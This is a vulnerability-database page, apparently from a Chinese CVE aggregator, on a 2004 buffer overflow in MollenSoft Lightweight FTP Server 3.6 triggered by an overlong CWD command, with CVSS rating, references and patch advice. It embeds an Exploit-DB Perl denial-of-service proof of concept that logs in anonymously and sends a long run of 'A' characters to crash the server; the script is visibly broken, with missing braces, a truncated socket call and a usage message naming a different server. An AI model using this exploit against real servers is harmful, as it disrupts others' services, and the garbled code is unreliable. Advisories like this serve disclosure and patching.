发布时间 :2004-03-24 00:00:00
修订时间 :2016-10-17 23:05:17

[原文]Buffer overflow in Mollensoft Lightweight FTP Server 3.6 allows remote authenticated users to cause a denial of service (crash) and possibly execute arbitrary code via a long CWD command, as demonstrated in one example by using the "cd" command in an interactive FTP client.

[CNNVD]MollenSoft Lightweight FTP Server远程拒绝服务漏洞(CNNVD-200403-101)

        MollenSoft Lightweight FTP Server是一款小型FTP服务程序。
        Lightweight FTP服务程序对CWD命令参数缺少充分边界检查,远程攻击者可以利用这个漏洞对FTP进行拒绝服务攻击,可能以进程权限执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040528 Mollensoft ftp Server ver 3.6 Buffer overflow
(UNKNOWN)  BUGTRAQ  20040601 Mollensoft Lightweight FTP Server CWD Buffer Overflow
(VENDOR_ADVISORY)  XF  mollensoft-cwd-command-bo(16237)
(VENDOR_ADVISORY)  XF  mollensoft-cd-bo(16303)

- 漏洞信息

MollenSoft Lightweight FTP Server远程拒绝服务漏洞
高危 边界条件错误
2004-03-24 00:00:00 2005-10-20 00:00:00
        MollenSoft Lightweight FTP Server是一款小型FTP服务程序。
        Lightweight FTP服务程序对CWD命令参数缺少充分边界检查,远程攻击者可以利用这个漏洞对FTP进行拒绝服务攻击,可能以进程权限执行任意指令。

- 公告与补丁

        Mollensoft Software

- 漏洞信息 (24142)

MollenSoft Lightweight FTP Server 3.6 Remote Denial Of Service Vulnerability (EDBID:24142)
windows dos
2004-05-24 Verified
0 storm
N/A [点击下载]

A denial of service condition is reported to exist in the MollenSoft Lightweight FTP Server that may allow a remote user to deny service to legitimate FTP users. The vulnerability is due to a lack of sufficient boundary checks performed on CWD command arguments.

It should be noted that although this vulnerability is reported to affect Mollensoft Lightweight FTP Server version 3.6 other versions might also be affected. 

# Mollensoft FTP Server CMD Buffer Overflow
# Orkut users? Come join the SecuriTeam community

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
$socket or die "Cannot connect to host!\n";


# receive greeting
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;

# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $username\r\n";
print $socket "USER $username\r\n";

select(undef, undef, undef, 0.002); # sleep of 2 milliseconds

# send PASS command
my $password = "a\";
print "PASS $password\r\n";
print $socket "PASS $password\r\n";

my $cmd = "CWD ";
$cmd .= "A" x 224; # Value can range from 224 to 1018
$cmd .= "\r\n";
print "length: ".length($cmd)."\n";
print $socket $cmd;

$repcode = "";
recv_reply($socket, $repcode);


sub usage
 # print usage information
 print "\nUsage: <host> <port>\n
<host> - The host to connect to
<port> - The TCP port which WarFTP is listening on\n\n";

sub recv_reply
 # retrieve any reply
 my $socket = shift;
 my $repcode = shift;
 $socket or die "Can't receive on socket\n";

 my $res="";
  $res .= $_;
  if (/$repcode/) { last; }
 return $res;


- 漏洞信息

Mollensoft Lightweight FTP Server CWD Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in Mollensoft FTP Server. The FTP Server fails to check the lenght of the CWD commands resulting in a buffer overflow. With a specially crafted request, an attacker can cause the daemon to crash resulting in a loss of availability.

- 时间线

2004-05-24 2004-02-11
2004-05-24 Unknow

- 解决方案

Upgrade to version 3.6 (patched) or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者